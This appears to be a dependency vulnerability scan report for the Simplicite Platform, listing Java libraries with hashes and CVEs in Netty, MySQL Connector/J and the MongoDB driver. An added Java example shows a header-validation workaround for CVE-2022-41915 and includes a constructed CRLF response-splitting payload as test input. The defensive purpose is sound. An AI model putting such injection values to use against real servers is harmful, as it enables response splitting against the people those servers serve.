Evidence Type Source Name Value Confidence Vendor file name mimepull High Vendor jar package name jvnet Highest Vendor jar package name mimepull Highest Vendor Manifest bundle-docurl http://www.oracle.com/ Low Vendor Manifest bundle-symbolicname org.jvnet.mimepull Medium Vendor Manifest implementation-build-id tags/mimepull-1.9.3-198, 2013-04-19T09:41:12+0000 Low Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id org.jvnet.mimepull Medium Vendor pom artifactid mimepull Highest Vendor pom artifactid mimepull Low Vendor pom developer email jitendra.kotamraju@oracle.com Low Vendor pom developer email martin.grebac@oracle.com Low Vendor pom developer name Jitendra Kotamraju Medium Vendor pom developer name Martin Grebac Medium Vendor pom developer org Oracle Corporation Medium Vendor pom groupid org.jvnet.mimepull Highest Vendor pom name MIME streaming extension High Vendor pom organization name Oracle Corporation High Vendor pom organization url http://www.oracle.com/ Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://mimepull.java.net Highest Product file name mimepull High Product jar package name jvnet Highest Product jar package name mimepull Highest Product Manifest bundle-docurl http://www.oracle.com/ Low Product Manifest Bundle-Name MIME streaming extension Medium Product Manifest bundle-symbolicname org.jvnet.mimepull Medium Product Manifest implementation-build-id tags/mimepull-1.9.3-198, 2013-04-19T09:41:12+0000 Low Product Manifest Implementation-Title MIME streaming extension High Product pom artifactid mimepull Highest Product pom developer email jitendra.kotamraju@oracle.com Low Product pom developer email martin.grebac@oracle.com Low Product pom developer name Jitendra Kotamraju Low Product pom developer name Martin Grebac Low Product pom developer org Oracle Corporation Low Product pom groupid org.jvnet.mimepull Highest Product pom name MIME streaming extension High Product pom organization name Oracle Corporation Low Product pom organization url http://www.oracle.com/ Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://mimepull.java.net Medium Version file version 1.9.3 High Version Manifest Bundle-Version 1.9.3 High Version Manifest Implementation-Version 1.9.3 High Version pom parent-version 1.9.3 Low Version pom version 1.9.3 Highest
mongodb-driver-core-3.11.0.jar
Description:
The Java operations layer for the MongoDB Java Driver.
Third parties can wrap this layer to provide custom higher-level APIs
License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/mongodb/mongodb-driver-core/3.11.0/mongodb-driver-core-3.11.0.jar
MD5: e62d9fd039afce756432e537a8c0f0c2
SHA1: af6b55599d9b2d8c1dd5ba2eb5e6095583d13969
SHA256: fbcf6f4993d7fefba5e39abd7f62e4aafad1b578968f94f8fd138c68efd8e39a
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name mongodb-driver-core High Vendor jar package name mongodb Highest Vendor jar package name operations Highest Vendor Manifest automatic-module-name org.mongodb.driver.core Medium Vendor Manifest bundle-symbolicname org.mongodb.driver-core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid mongodb-driver-core Highest Vendor pom artifactid mongodb-driver-core Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name MongoDB Java Driver Core High Vendor pom url http://www.mongodb.org Highest Product file name mongodb-driver-core High Product jar package name mongodb Highest Product jar package name operations Highest Product Manifest automatic-module-name org.mongodb.driver.core Medium Product Manifest Bundle-Name mongodb-driver-core Medium Product Manifest bundle-symbolicname org.mongodb.driver-core Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid mongodb-driver-core Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name MongoDB Java Driver Core High Product pom url http://www.mongodb.org Medium Version file version 3.11.0 High Version Manifest build-version 3.11.0 Medium Version Manifest Bundle-Version 3.11.0 High Version pom version 3.11.0 Highest
Related Dependencies
mongodb-driver-3.11.0.jar
File Path: /var/simplicite/.m2/repository/org/mongodb/mongodb-driver/3.11.0/mongodb-driver-3.11.0.jar
MD5: 43dd8d23d9b96f2a06ce11e97b66e750
SHA1: 26a39c8248012d0acb5613eacacf9d0957fc2864
SHA256: dfcbc1a1aba1e530e0f5b580dc99be4fcfc092d0005419236e1bae4f4e056ccc
pkg:maven/org.mongodb/mongodb-driver@3.11.0
CVE-2021-20328
Specific versions of the Java driver that support client-side field level encryption (CSFLE) fail to perform correct host name verification on the KMS server's certificate. This vulnerability in combination with a privileged network position active MITM attack could result in interception of traffic between the Java driver and the KMS service rendering Field Level Encryption ineffective. This issue was discovered during internal testing and affects all versions of the Java driver that support CSFLE. The Java async, Scala, and reactive streams drivers are not impacted. This vulnerability does not impact driver traffic payloads with CSFLE-supported key services originating from applications residing inside the AWS, GCP, and Azure network fabrics due to compensating controls in these environments. This issue does not impact driver workloads that don't use Field Level Encryption.
CWE-295 Improper Certificate Validation
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:A/AC:M/Au:N/C:P/I:P/A:N
CVSSv3:
Base Score: MEDIUM (6.8) Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
Vulnerable Software & Versions:
mssql-jdbc-12.2.0.jre8.jar
Description:
Microsoft JDBC Driver for SQL Server.
License:
MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /var/simplicite/.m2/repository/com/microsoft/sqlserver/mssql-jdbc/12.2.0.jre8/mssql-jdbc-12.2.0.jre8.jar
MD5: 06ec244736a3f34258fac4c32fb76d07
SHA1: 24230b89715e4a101e1f2263293a2343a710ecd1
SHA256: 7f1d146d53f61261de22e1af910c43329fb59ef4299041ae6705ec711c418548
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name mssql-jdbc High Vendor jar package name jdbc Highest Vendor jar package name microsoft Highest Vendor jar package name mssql Highest Vendor jar package name sql Highest Vendor jar package name sqlserver Highest Vendor Manifest build-jdk-spec 19 Low Vendor Manifest bundle-symbolicname com.microsoft.sqlserver.mssql-jdbc Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid mssql-jdbc Highest Vendor pom artifactid mssql-jdbc Low Vendor pom developer org Microsoft Medium Vendor pom developer org URL http://www.microsoft.com Medium Vendor pom groupid com.microsoft.sqlserver Highest Vendor pom name Microsoft JDBC Driver for SQL Server High Vendor pom organization name Microsoft Corporation High Vendor pom url Microsoft/mssql-jdbc Highest Product file name mssql-jdbc High Product jar package name jdbc Highest Product jar package name microsoft Highest Product jar package name mssql Highest Product jar package name osgi Highest Product jar package name sql Highest Product jar package name sqlserver Highest Product Manifest build-jdk-spec 19 Low Product Manifest Bundle-Name Microsoft JDBC Driver for SQL Server Medium Product Manifest bundle-symbolicname com.microsoft.sqlserver.mssql-jdbc Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid mssql-jdbc Highest Product pom developer org Microsoft Low Product pom developer org URL http://www.microsoft.com Low Product pom groupid com.microsoft.sqlserver Highest Product pom name Microsoft JDBC Driver for SQL Server High Product pom organization name Microsoft Corporation Low Product pom url Microsoft/mssql-jdbc High Version file version 12.2.0.jre8 High Version pom version 12.2.0.jre8 Highest
mysql-connector-j-8.1.0.jar
Description:
JDBC Type 4 driver for MySQL.
License:
The GNU General Public License, v2 with Universal FOSS Exception, v1.0
File Path: /var/simplicite/.m2/repository/com/mysql/mysql-connector-j/8.1.0/mysql-connector-j-8.1.0.jar
MD5: e84fdafa40e6625878f79efc7339d93b
SHA1: 3f78d2963935f44a61edb3961a591cdc392c8941
SHA256: e2e657e9c5ebe06a73485c9739ebd8a18e7bebb852a58d0da287da850beca1c7
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name mysql-connector-j High Vendor hint analyzer vendor oracle Highest Vendor hint analyzer (hint) vendor sun Highest Vendor jar package name cj Highest Vendor jar package name driver Highest Vendor jar package name jdbc Highest Vendor jar package name mysql Highest Vendor jar package name type Highest Vendor Manifest bundle-symbolicname com.mysql.cj Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.mysql Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor pom artifactid mysql-connector-j Highest Vendor pom artifactid mysql-connector-j Low Vendor pom developer email filipe.silva@oracle.com Low Vendor pom developer name Filipe Silva Medium Vendor pom developer org Oracle Corporation Medium Vendor pom developer org URL https://www.oracle.com/ Medium Vendor pom groupid com.mysql Highest Vendor pom name MySQL Connector/J High Vendor pom organization name Oracle Corporation High Vendor pom organization url https://www.oracle.com/ Medium Vendor pom url http://dev.mysql.com/doc/connector-j/en/ Highest Product file name mysql-connector-j High Product hint analyzer product mysql_connector/j Highest Product hint analyzer product mysql_connector_j Highest Product hint analyzer product mysql_connectors Highest Product jar package name cj Highest Product jar package name driver Highest Product jar package name jdbc Highest Product jar package name mysql Highest Product jar package name type Highest Product jar package name xdevapi Highest Product Manifest Bundle-Name Oracle Corporation's JDBC and XDevAPI Driver for MySQL Medium Product Manifest bundle-symbolicname com.mysql.cj Medium Product Manifest Implementation-Title MySQL Connector/J High Product Manifest specification-title JDBC Medium Product pom artifactid mysql-connector-j Highest Product pom developer email filipe.silva@oracle.com Low Product pom developer name Filipe Silva Low Product pom developer org Oracle Corporation Low Product pom developer org URL https://www.oracle.com/ Low Product pom groupid com.mysql Highest Product pom name MySQL Connector/J High Product pom organization name Oracle Corporation Low Product pom organization url https://www.oracle.com/ Low Product pom url http://dev.mysql.com/doc/connector-j/en/ Medium Version file version 8.1.0 High Version Manifest Bundle-Version 8.1.0 High Version Manifest Implementation-Version 8.1.0 High Version pom version 8.1.0 Highest
CVE-2023-22102
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.1.0 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Connectors, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (8.3) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
netcdf4-4.5.5.jar
File Path: /var/simplicite/.m2/repository/edu/ucar/netcdf4/4.5.5/netcdf4-4.5.5.jar
MD5: 5f14df469295650fd65748a003c9ba56
SHA1: 0675d63ecc857c50dd50858011b670160aa30b62
SHA256: 131e3983dcf001677be069a7471797a4a9ad2c9783e88db56e32506cf1039635
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name netcdf4 High Vendor jar package name jni Highest Vendor jar package name netcdf Highest Vendor jar package name ucar Highest Vendor Manifest built-on 20150306.1537 Low Vendor Manifest Implementation-Vendor UCAR/Unidata High Vendor Manifest Implementation-Vendor-Id edu.ucar Medium Vendor pom artifactid netcdf4 Highest Vendor pom artifactid netcdf4 Low Vendor pom groupid edu.ucar Highest Vendor pom name netCDF-4 IOSP JNI connection to C library High Vendor pom parent-artifactid thredds-parent Low Product file name netcdf4 High Product jar package name jni Highest Product jar package name netcdf Highest Product jar package name ucar Highest Product Manifest built-on 20150306.1537 Low Product Manifest Implementation-Title netCDF-4 IOSP JNI connection to C library High Product pom artifactid netcdf4 Highest Product pom groupid edu.ucar Highest Product pom name netCDF-4 IOSP JNI connection to C library High Product pom parent-artifactid thredds-parent Medium Version file version 4.5.5 High Version Manifest Implementation-Version 4.5.5 High Version pom version 4.5.5 Highest
netty-codec-4.1.49.Final.jar
Description:
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients.
License:
http://www.apache.org/licenses/LICENSE-2.0
File Path: /var/simplicite/.m2/repository/io/netty/netty-codec/4.1.49.Final/netty-codec-4.1.49.Final.jar
MD5: d93ec0a7903c28b2b4c74eda0912aa41
SHA1: 20218de83c906348283f548c255650fd06030424
SHA256: 670c1f09d43b6e881437296ce6e8fa7f8dcb1eaef78b2144d61234d6515b47af
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name netty-codec High Vendor jar package name codec Highest Vendor jar package name io Highest Vendor jar package name netty Highest Vendor Manifest automatic-module-name io.netty.codec Medium Vendor Manifest bundle-docurl https://netty.io/ Low Vendor Manifest bundle-symbolicname io.netty.codec Medium Vendor Manifest implementation-url https://netty.io/netty-codec/ Low Vendor Manifest Implementation-Vendor The Netty Project High Vendor Manifest Implementation-Vendor-Id io.netty Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid netty-codec Highest Vendor pom artifactid netty-codec Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Codec High Vendor pom parent-artifactid netty-parent Low Product file name netty-codec High Product jar package name codec Highest Product jar package name io Highest Product jar package name netty Highest Product Manifest automatic-module-name io.netty.codec Medium Product Manifest bundle-docurl https://netty.io/ Low Product Manifest Bundle-Name Netty/Codec Medium Product Manifest bundle-symbolicname io.netty.codec Medium Product Manifest Implementation-Title Netty/Codec High Product Manifest implementation-url https://netty.io/netty-codec/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid netty-codec Highest Product pom groupid io.netty Highest Product pom name Netty/Codec High Product pom parent-artifactid netty-parent Medium Version Manifest Bundle-Version 4.1.49.Final High Version Manifest Implementation-Version 4.1.49.Final High Version pom version 4.1.49.Final Highest
CVE-2021-37136
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder function doesn't restrict the chunk length, which may lead to excessive memory usage. Besides this, it also may buffer reserved skippable chunks until the whole chunk was received, which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-41881
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder.
CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-43797
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forwards these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-41915 (OSSINDEX)
Netty project is an event-driven asynchronous network application framework. Starting in version 4.1.83.Final and prior to 4.1.86.Final, when calling `DefaultHttpHeaders.set` with an _iterator_ of values, header value validation was not performed, allowing malicious header values in the iterator to perform HTTP Response Splitting. This issue has been patched in version 4.1.86.Final. Integrators can work around the issue by changing the `DefaultHttpHeaders.set(CharSequence, Iterator<?>)` call into a `remove()` call, and calling `add()` in a loop over the iterator of values.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-41915 for details. CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
CVSSv2: Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:/C:L/I:L/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec:4.1.49.Final:*:*:*:*:*:*:*
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the server name indicated by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet, but no checks are done here and, the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
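The header-setting workaround described under CVE-2022-41915 above, as an added example; this is not code from the Netty project or from the scanned application. It replaces the multi-value `set` call (Netty's `HttpHeaders.set(CharSequence, Iterable<?>)`, which the advisory text refers to as the iterator overload) with `remove()` followed by one `add()` per value, so that every value goes through the validator that a `DefaultHttpHeaders` built with `validate = true` applies on `add()`. The class and helper names, and the CRLF-laden cookie value, are this example's own; it assumes Netty 4.1.x (`netty-codec-http`) on the classpath.

```java
import io.netty.handler.codec.http.DefaultHttpHeaders;
import io.netty.handler.codec.http.HttpHeaders;

import java.util.Arrays;

/**
 * Added example (not Netty project code): the CVE-2022-41915 workaround.
 * Instead of headers.set(name, values), which skipped value validation on
 * Netty 4.1.83.Final to 4.1.85.Final, remove the header and add() one value at a
 * time; add() on a validating DefaultHttpHeaders checks every value.
 */
public final class SafeHeaderSet {

    /** The advisory's workaround: remove, then add each value so each one is validated. */
    static HttpHeaders setHeaderValidated(HttpHeaders headers, CharSequence name, Iterable<?> values) {
        headers.remove(name);
        for (Object value : values) {
            headers.add(name, value); // throws IllegalArgumentException on a CR/LF that starts a new header line
        }
        return headers;
    }

    /** True when the validating remove()/add() path rejects the given value. */
    static boolean rejectsValue(String value) {
        HttpHeaders headers = new DefaultHttpHeaders(true); // validate = true, which is also the default
        try {
            setHeaderValidated(headers, "Set-Cookie", Arrays.asList("session=abc", value));
            return false;
        } catch (IllegalArgumentException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        // Constructed response-splitting payload: the value tries to terminate the header
        // block and append its own body.
        String injected = "x=1\r\nContent-Length: 0\r\n\r\n<html>injected</html>";

        HttpHeaders clean = setHeaderValidated(new DefaultHttpHeaders(), "Accept",
                Arrays.asList("text/html", "application/json"));
        System.out.println("clean values stored: " + clean.getAll("Accept"));
        System.out.println("CRLF value rejected by the remove()/add() path: " + rejectsValue(injected));

        // The call pattern the advisory warns about. On 4.1.83.Final to 4.1.85.Final this stores
        // the injected value unchecked; on other 4.1.x versions set() validates and throws too.
        HttpHeaders viaSet = new DefaultHttpHeaders();
        try {
            viaSet.set("Set-Cookie", Arrays.asList("session=abc", injected));
            System.out.println("set() stored " + viaSet.getAll("Set-Cookie").size() + " values without validation");
        } catch (IllegalArgumentException e) {
            System.out.println("set() validated the value: " + e.getMessage());
        }
    }
}
```

The 4.1.49.Final build flagged here predates the regression, so `set()` validates on it as well; the helper matters when a dependency bump lands in the 4.1.83.Final to 4.1.85.Final window, and it costs nothing on any other version.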
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and is then sent up to the child channel's pipeline and proxied through to a remote peer as HTTP/1.1, this may result in request smuggling. In a proxy case, users may assume the Content-Length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is an HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `Http2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final
- [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48)
- [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022
- [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final
- [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290
- [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290
- [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0
- [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295
- [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
